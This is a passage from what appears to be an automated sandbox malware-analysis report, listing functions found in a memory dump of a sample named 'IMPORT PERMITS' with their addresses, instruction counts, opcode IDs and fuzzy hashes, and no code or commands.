                                                                                                                                • Snapshot File: hcaresult_2_2_13b0000_IMPORT PERMITS.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: bd8ac78140f895066083d1addf409b64165891323dc0076c6e3fdac533eabcce
                                                                                                                                • Instruction ID: 39995d70435385ce7631f59c0b0120a65af3b137061cd389a9c17e317169e8af
                                                                                                                                • Opcode Fuzzy Hash: bd8ac78140f895066083d1addf409b64165891323dc0076c6e3fdac533eabcce
                                                                                                                                • Instruction Fuzzy Hash: EB110473600605BFD7229F49DD41F9BBBB8EB94754F10402AF6049B2A0D676ED84CB50
                                                                                                                                Function 013E8770 Relevance: .1, Instructions: 68COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000002.00000002.2056962870.00000000013B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013B0000, based on PE: true
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_2_2_13b0000_IMPORT PERMITS.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 2eaf3db2be58c97b89ccfd4bc7e6d54f7eea7679af9e6129ecb9f2d8e1851f60
                                                                                                                                • Instruction ID: ab5b2b584afe96b4d21121893a58bbfd4ba7fe5bac4576d71e1a0bed51da78b8
                                                                                                                                • Opcode Fuzzy Hash: 2eaf3db2be58c97b89ccfd4bc7e6d54f7eea7679af9e6129ecb9f2d8e1851f60
                                                                                                                                • Instruction Fuzzy Hash: 48110135B01721DBDB11CF4DC4C4A66BBE9AF4A718B1880EDEE08AF240D6B2D901CB90
                                                                                                                                Function 0141AAEE Relevance: .1, Instructions: 68COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000002.00000002.2056962870.00000000013B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013B0000, based on PE: true
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_2_2_13b0000_IMPORT PERMITS.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 3b9caaf395a22a4929ed725bdef4f5484843110ef385696de3fd96b14fff4041
                                                                                                                                • Instruction ID: c39c09ddba016c1d167b1a34d8bb9ff9b44c2cbc6eaa3ce89750196fc6c4a65f
                                                                                                                                • Opcode Fuzzy Hash: 3b9caaf395a22a4929ed725bdef4f5484843110ef385696de3fd96b14fff4041
                                                                                                                                • Instruction Fuzzy Hash: 81217C71601681DFDB318F49C540A66BBE6FB94B10F25883EEA4A87725C730EC01CB40
                                                                                                                                Function 013E80E9 Relevance: .1, Instructions: 66COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000002.00000002.2056962870.00000000013B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013B0000, based on PE: true
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_2_2_13b0000_IMPORT PERMITS.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 0e679bfdb60fe05b068c89f6a05f9bd09329633379b240d008c2b488629144d2
                                                                                                                                • Instruction ID: f89bc705bee248ae499619dda0edcbda53555e0e4219e19481929c5fd4f88963
                                                                                                                                • Opcode Fuzzy Hash: 0e679bfdb60fe05b068c89f6a05f9bd09329633379b240d008c2b488629144d2
                                                                                                                                • Instruction Fuzzy Hash: 8E215B75A4021ADFCB14CF98C581AAEBBF5FB88318F2441ADD505AB351CB71ED06CB90
                                                                                                                                Function 0141674D Relevance: .1, Instructions: 65COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000002.00000002.2056962870.00000000013B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013B0000, based on PE: true
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_2_2_13b0000_IMPORT PERMITS.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 5ad726358f581601346cf5820f9318667946dc9aaa89a00bd9255bb4dfff337b
                                                                                                                                • Instruction ID: df24e56ef88b364d0df7dd57a4a2b443d8eb2e72369176c0e43ea72c6ffb4275
                                                                                                                                • Opcode Fuzzy Hash: 5ad726358f581601346cf5820f9318667946dc9aaa89a00bd9255bb4dfff337b
                                                                                                                                • Instruction Fuzzy Hash: 77216075601A01EFD7218F69C841F66B7F8FF44250F45882EE5AEC7661DBB0E851CB60
                                                                                                                                Function 01476870 Relevance: .1, Instructions: 63COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000002.00000002.2056962870.00000000013B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013B0000, based on PE: true
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_2_2_13b0000_IMPORT PERMITS.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 5e013e06c96de1ec604acf123eadb18ff91b8f43fe762b02e3b9c0d7d789ff7a
                                                                                                                                • Instruction ID: aaff316761272d25e6d7540bc32070b578f6c81cf369930baf6bc20af81ffcf5
                                                                                                                                • Opcode Fuzzy Hash: 5e013e06c96de1ec604acf123eadb18ff91b8f43fe762b02e3b9c0d7d789ff7a
                                                                                                                                • Instruction Fuzzy Hash: DB11E372240A05EFE722CB5EC940FDA77A9EF99754F12402AF205DB270DA70EC01C7A0
                                                                                                                                Function 0140E8C0 Relevance: .1, Instructions: 63COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000002.00000002.2056962870.00000000013B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013B0000, based on PE: true
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_2_2_13b0000_IMPORT PERMITS.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 7ef419f7762ec440abeb3a2b94c43976684c6c7bc85500c0a432fd02a8202ecb
                                                                                                                                • Instruction ID: ca978417a8891c18b1f4f45cd900f3402612778fa6cc6ee8097395db858ab375
                                                                                                                                • Opcode Fuzzy Hash: 7ef419f7762ec440abeb3a2b94c43976684c6c7bc85500c0a432fd02a8202ecb
                                                                                                                                • Instruction Fuzzy Hash: 9E1108723001149FDF1ADB2ECC95A6B7256EBD5374B26493BD9269B3A0EA309812C690
                                                                                                                                Function 014166B0 Relevance: .1, Instructions: 61COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000002.00000002.2056962870.00000000013B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013B0000, based on PE: true
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_2_2_13b0000_IMPORT PERMITS.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 90206c7f760b4c9cfc3bf99f6a1cfc1b3e25f3240f5dcb70c22ff036aa7bf538
                                                                                                                                • Instruction ID: 2418c74af8f5e90da3b011a7a4b62eaaa306d046c80ee16f0a051befe167ee66
                                                                                                                                • Opcode Fuzzy Hash: 90206c7f760b4c9cfc3bf99f6a1cfc1b3e25f3240f5dcb70c22ff036aa7bf538
                                                                                                                                • Instruction Fuzzy Hash: 52119176A01205DFCF25DF9DC580A5BBBF4AF94650B07407ED9259B329E6B0DD01CB90
                                                                                                                                Function 014AA8E4 Relevance: .1, Instructions: 61COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000002.00000002.2056962870.00000000013B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013B0000, based on PE: true
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_2_2_13b0000_IMPORT PERMITS.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 4aa21802b203594a0c183a0f29eab8f59a86752156d6c183eb3a1b7e63dba1b2
                                                                                                                                • Instruction ID: 19fa50207183e700bb6d5ef1689747dcf517e918ce61337c37a3864771949d24
                                                                                                                                • Opcode Fuzzy Hash: 4aa21802b203594a0c183a0f29eab8f59a86752156d6c183eb3a1b7e63dba1b2
                                                                                                                                • Instruction Fuzzy Hash: 30110436A00906AFDB19CB59C801B9EBBB9EFA4310F16826AE84597350E631ED01CB80
                                                                                                                                Function 0146E7E1 Relevance: .1, Instructions: 59COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000002.00000002.2056962870.00000000013B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013B0000, based on PE: true
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_2_2_13b0000_IMPORT PERMITS.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: be7cdff5b472ac4535dea4ef4a70d93a0a3acfb449cd7ab0a5074af29ebfca6c
                                                                                                                                • Instruction ID: d2d530545af5dea57df4b5cf087ba223b792eb516684159225b6ebeb68a76217
                                                                                                                                • Opcode Fuzzy Hash: be7cdff5b472ac4535dea4ef4a70d93a0a3acfb449cd7ab0a5074af29ebfca6c
                                                                                                                                • Instruction Fuzzy Hash: 50119E3A600601EFEB21DF49C844B57BBE9EF55758F05842EEA09AB270DB31DC41DB91
                                                                                                                                Function 014027ED Relevance: .1, Instructions: 58COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000002.00000002.2056962870.00000000013B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013B0000, based on PE: true
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_2_2_13b0000_IMPORT PERMITS.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 21f5e0032625120403abc9f7ee7a9e9d7d1544467686e739caa0b22908309ca5
                                                                                                                                • Instruction ID: 0743e48d40fe0caf953a1fc04e12cb0b97789d11507d0ff0ec0fe51ea91dc3e4
                                                                                                                                • Opcode Fuzzy Hash: 21f5e0032625120403abc9f7ee7a9e9d7d1544467686e739caa0b22908309ca5
                                                                                                                                • Instruction Fuzzy Hash: 6A012676245645ABF317A26EDC88F276B8DEF80398F150077FA018B2F0D974DC01C261
                                                                                                                                Function 013E4690 Relevance: .1, Instructions: 57COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000002.00000002.2056962870.00000000013B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013B0000, based on PE: true
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_2_2_13b0000_IMPORT PERMITS.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: d0b2e17e380720f8ba21add9c8f678e6a3e38ea5a5e39a8ff9f5ca53b9f448d8
                                                                                                                                • Instruction ID: b8b0d8ecdaed0ecbb4b2c7be460ca022db4de7ad5fd19b4fd677acc7e3ecee57
                                                                                                                                • Opcode Fuzzy Hash: d0b2e17e380720f8ba21add9c8f678e6a3e38ea5a5e39a8ff9f5ca53b9f448d8
                                                                                                                                • Instruction Fuzzy Hash: 6D11E036284764AFDB21CF59D888B567BE8EB99768F004119FA24CB790C370E800CFA0
                                                                                                                                Function 014B4B00 Relevance: .1, Instructions: 57COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000002.00000002.2056962870.00000000013B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013B0000, based on PE: true
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_2_2_13b0000_IMPORT PERMITS.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 65852675c18840a7aa8ce5a4ccf504f742bdb0018ad94d29f061cb12d6292938
                                                                                                                                • Instruction ID: 06cb72b92b3be5bbe870b666d74b1bf305d3ca19fc400035f1f8fb47360ca543
                                                                                                                                • Opcode Fuzzy Hash: 65852675c18840a7aa8ce5a4ccf504f742bdb0018ad94d29f061cb12d6292938
                                                                                                                                • Instruction Fuzzy Hash: 9011CA362046119FDB219A6DD880F97B7A5FFC4710F19441AE743C77A1DA30E802C7A0
                                                                                                                                Function 01416620 Relevance: .1, Instructions: 56COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000002.00000002.2056962870.00000000013B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013B0000, based on PE: true
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_2_2_13b0000_IMPORT PERMITS.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 8b368f2ae472d87f4afc77044521920b8a890a3bf45313d7df3bf9dab6fc76d6
                                                                                                                                • Instruction ID: 18fbe6eb29921d2192e216d6306e4ab817995163fd301430f34fee42be87ae57
                                                                                                                                • Opcode Fuzzy Hash: 8b368f2ae472d87f4afc77044521920b8a890a3bf45313d7df3bf9dab6fc76d6
                                                                                                                                • Instruction Fuzzy Hash: 3B11C276A00716ABDB21DF5DC980B5EFBB8EF84744F52085ADA08A7314D770ED01CB50
                                                                                                                                Function 0140EA2E Relevance: .1, Instructions: 56COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000002.00000002.2056962870.00000000013B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013B0000, based on PE: true
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_2_2_13b0000_IMPORT PERMITS.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 3d468f2a9b8ca795de0c5324a587c6b29c6b30a57871d75d37c19a9ee551e915
                                                                                                                                • Instruction ID: 3114b31562967d5a5a7db8b51886a32c34e926d87d7b74c613f841b5239aa961
                                                                                                                                • Opcode Fuzzy Hash: 3d468f2a9b8ca795de0c5324a587c6b29c6b30a57871d75d37c19a9ee551e915
                                                                                                                                • Instruction Fuzzy Hash: 7F0192716012099FCB26DB1AE548F16BBF9EB95718F21857AE1059B2B0CB70DC82CF90
                                                                                                                                Function 0140E53E Relevance: .1, Instructions: 55COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000002.00000002.2056962870.00000000013B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013B0000, based on PE: true
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_2_2_13b0000_IMPORT PERMITS.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 3cef38ccb94af525019048e13b43edf7cf1492b2ee9bf366ac8f969377c4ca22
                                                                                                                                • Instruction ID: e35df9e8708e8d8149f2fa73f23d383705c85f99c60b0699e351cca5fb365179
                                                                                                                                • Opcode Fuzzy Hash: 3cef38ccb94af525019048e13b43edf7cf1492b2ee9bf366ac8f969377c4ca22
                                                                                                                                • Instruction Fuzzy Hash: 0B11E5722056C29BF723976DD954B267B94AB00748F1908B2EE41A77F2F739C857C250
                                                                                                                                Function 0146E75D Relevance: .1, Instructions: 54COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000002.00000002.2056962870.00000000013B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013B0000, based on PE: true
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_2_2_13b0000_IMPORT PERMITS.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 9e027ce95eb4732775abeceb8693466c215af0eeeb981fbb7873360829093128
                                                                                                                                • Instruction ID: d73621024f882277d6b7a15369ab5dbbb0b1447ff04b01b2e88e7e1c88320554
                                                                                                                                • Opcode Fuzzy Hash: 9e027ce95eb4732775abeceb8693466c215af0eeeb981fbb7873360829093128
                                                                                                                                • Instruction Fuzzy Hash: 7F01D67A600205AFE721DF5AC804F577AEDEF50B5AF058027EA05AB270D779DD40C791
                                                                                                                                Function 013DA250 Relevance: .1, Instructions: 52COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000002.00000002.2056962870.00000000013B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013B0000, based on PE: true
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_2_2_13b0000_IMPORT PERMITS.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 3c789e6569c780a36f7740ae573b44e677a8d28900b05b280d318a59104278c5
                                                                                                                                • Instruction ID: 24d8643e594120bf1fa21915bfa6026dbf7c328ca8ea47ac24050512ed43de96
                                                                                                                                • Opcode Fuzzy Hash: 3c789e6569c780a36f7740ae573b44e677a8d28900b05b280d318a59104278c5
                                                                                                                                • Instruction Fuzzy Hash: BD0149735047269BCB318F1AE940A367BF8FF55764700892DFD958B681C332D400CB60
                                                                                                                                Function 014B4940 Relevance: .1, Instructions: 52COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000002.00000002.2056962870.00000000013B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013B0000, based on PE: true
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_2_2_13b0000_IMPORT PERMITS.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: dd3b49b6e94de7dfd6d8a575a81b56cd83c11b3de44047c6b7956b525f3edc77
                                                                                                                                • Instruction ID: 688a6f3d5f0785245908a15b567c88daf38f921c7c24ba364481ff01030e2c9c
                                                                                                                                • Opcode Fuzzy Hash: dd3b49b6e94de7dfd6d8a575a81b56cd83c11b3de44047c6b7956b525f3edc77
                                                                                                                                • Instruction Fuzzy Hash: C9012B324412019FC732DF2CC880E97BBA8EB81374B194216E96A572B3D730D801C7E0
                                                                                                                                Function 0145E1D0 Relevance: .1, Instructions: 51COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000002.00000002.2056962870.00000000013B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013B0000, based on PE: true
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_2_2_13b0000_IMPORT PERMITS.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: c5c33d61689889089159869658df963a1f174a3914f47c3110c87915757d0f71
                                                                                                                                • Instruction ID: cb2b704a1ea3cf09f88ef42b932a1aa0ff0c0fbbf755d44d825a4fbb8aef9652
                                                                                                                                • Opcode Fuzzy Hash: c5c33d61689889089159869658df963a1f174a3914f47c3110c87915757d0f71
                                                                                                                                • Instruction Fuzzy Hash: 5B118E31241241EFDB15AF19C990F16BBB8FF54B84F20006AF9059B6A1C635ED01CA90
                                                                                                                                Function 013E6259 Relevance: .1, Instructions: 51COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000002.00000002.2056962870.00000000013B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013B0000, based on PE: true
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_2_2_13b0000_IMPORT PERMITS.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 46833520229eb435349d91a2bc51f355912d453f536ab1b7e4f6a67d533f131b
                                                                                                                                • Instruction ID: d1287c7b8ff94d74d8e69b7efdc0e8c15e5cf126ecd6bd146c8ba4c3f34c87e9
                                                                                                                                • Opcode Fuzzy Hash: 46833520229eb435349d91a2bc51f355912d453f536ab1b7e4f6a67d533f131b
                                                                                                                                • Instruction Fuzzy Hash: 7D115E70541229ABDF25AF65CC52FE976B4BB24714F504199A318A61E0DB709E81CF84
                                                                                                                                Function 01466050 Relevance: .0, Instructions: 50COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000002.00000002.2056962870.00000000013B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013B0000, based on PE: true
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_2_2_13b0000_IMPORT PERMITS.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 2c11c0870b720d23d406ec26f1f59b59e6bfe53e2221e86f10d66e4edf32a982
                                                                                                                                • Instruction ID: 08bd100a0bf71afe7b4ee49722a89b7846e3a2544dd7ec6de409fd41ed8cad8e
                                                                                                                                • Opcode Fuzzy Hash: 2c11c0870b720d23d406ec26f1f59b59e6bfe53e2221e86f10d66e4edf32a982
                                                                                                                                • Instruction Fuzzy Hash: 8F1129B3900019ABCB11DB95CC80DDFBBBCEF58258F054166E906E7221EA34EA55CBE1
                                                                                                                                Function 013E208A Relevance: .0, Instructions: 50COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000002.00000002.2056962870.00000000013B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013B0000, based on PE: true
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_2_2_13b0000_IMPORT PERMITS.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: cec1b93156338fd1fb8a58b034706470ae4e768dca4fd24834b6fe138f7a55f1
                                                                                                                                • Instruction ID: 8166b9ca96f507450dafb01d714f7cab798b53395b41e494b6ed7c1a6b8b32d7
                                                                                                                                • Opcode Fuzzy Hash: cec1b93156338fd1fb8a58b034706470ae4e768dca4fd24834b6fe138f7a55f1
                                                                                                                                • Instruction Fuzzy Hash: 5E01F5326002208BDF158A5DD884A937BAEBFD8704F1A44AAED018F2D6DA71CC85C390
                                                                                                                                Function 01476500 Relevance: .0, Instructions: 50COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000002.00000002.2056962870.00000000013B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013B0000, based on PE: true
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_2_2_13b0000_IMPORT PERMITS.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: eb4c54e98bbc6bee417043bcc8199122a0012e9c4294f6f64213546b7c5f5284
                                                                                                                                • Instruction ID: f22373b9a9cbedd32e4a6903164b581dbb79bd71a07060b1f846d1519a4ed93c
                                                                                                                                • Opcode Fuzzy Hash: eb4c54e98bbc6bee417043bcc8199122a0012e9c4294f6f64213546b7c5f5284
                                                                                                                                • Instruction Fuzzy Hash: F811A5326445469FD711CF58E400BE6BBBAFB56314F09815AE949CB325D731EC41DBA0
                                                                                                                                Function 0146C810 Relevance: .0, Instructions: 50COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000002.00000002.2056962870.00000000013B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013B0000, based on PE: true
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_2_2_13b0000_IMPORT PERMITS.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: efa0df1729557851146951d1782bdba8b831ea88996978ee318c534bb19c0f74
                                                                                                                                • Instruction ID: c353a7edefe2b76e04d6cc5a1cbed1f81b138c7e2a1ef819bb9d1efe54194f57
                                                                                                                                • Opcode Fuzzy Hash: efa0df1729557851146951d1782bdba8b831ea88996978ee318c534bb19c0f74
                                                                                                                                • Instruction Fuzzy Hash: F31118B1E002199BCB10DFAAD581AAEBBF8FF58350F10406AF905E7351D674EA01CBA4
                                                                                                                                Function 0148EA60 Relevance: .0, Instructions: 50COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000002.00000002.2056962870.00000000013B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013B0000, based on PE: true
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_2_2_13b0000_IMPORT PERMITS.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 87f568b03cf4089cc826fdc8a629ca624ed210b4c2cf03ee9f6f1270f3adb732
                                                                                                                                • Instruction ID: 9e672a8e41a9153f600eadd7ee320afe64d411635538e877d4bcbf5c83c992b4
                                                                                                                                • Opcode Fuzzy Hash: 87f568b03cf4089cc826fdc8a629ca624ed210b4c2cf03ee9f6f1270f3adb732
                                                                                                                                • Instruction Fuzzy Hash: 9201B131140211DBCB32BF19844493BFBA9FF91A54B05842FE6596B321CB30DC42CB91
                                                                                                                                Function 013DC020 Relevance: .0, Instructions: 49COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000002.00000002.2056962870.00000000013B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013B0000, based on PE: true
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_2_2_13b0000_IMPORT PERMITS.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: dec391378cc995e4bcc1589e6a6118842a70016cea674f56f99eea4ad8bc76d4
                                                                                                                                • Instruction ID: 08f553d63742dfa6d7d57e456c5b20965466479f4272834d6366fed59e58e288
                                                                                                                                • Opcode Fuzzy Hash: dec391378cc995e4bcc1589e6a6118842a70016cea674f56f99eea4ad8bc76d4
                                                                                                                                • Instruction Fuzzy Hash: C401D8725107059FEB2296AAD840EA777EDFFD9254F44441EA6468BA90DA70E402C760
                                                                                                                                Function 014220F0 Relevance: .0, Instructions: 49COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000002.00000002.2056962870.00000000013B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013B0000, based on PE: true
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_2_2_13b0000_IMPORT PERMITS.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: b8631a98834e66efc6ee1a74eafb8599b4aeb6195a5c4542606ae40587a2fbe0
                                                                                                                                • Instruction ID: 85378e82b39d296a06eb6e4a3579e8c94e3b5f0b4a126af7d01aab9fc88f91f4
                                                                                                                                • Opcode Fuzzy Hash: b8631a98834e66efc6ee1a74eafb8599b4aeb6195a5c4542606ae40587a2fbe0
                                                                                                                                • Instruction Fuzzy Hash: 4A11AD35A0020DAFCB01DF68C840EAE7BB5EB54340F50405AF9019B2A0DA30AE41CB90
                                                                                                                                Function 0141E5CF Relevance: .0, Instructions: 49COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000002.00000002.2056962870.00000000013B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013B0000, based on PE: true
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_2_2_13b0000_IMPORT PERMITS.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 9d3101da012b1ab0b3269284cfb147abff8347a79c4c12d85f06832508ebd548
                                                                                                                                • Instruction ID: 7f9dc8ed01fba468552479d5cd3c5332df41864a269ac600f1c210ff53b66d8b
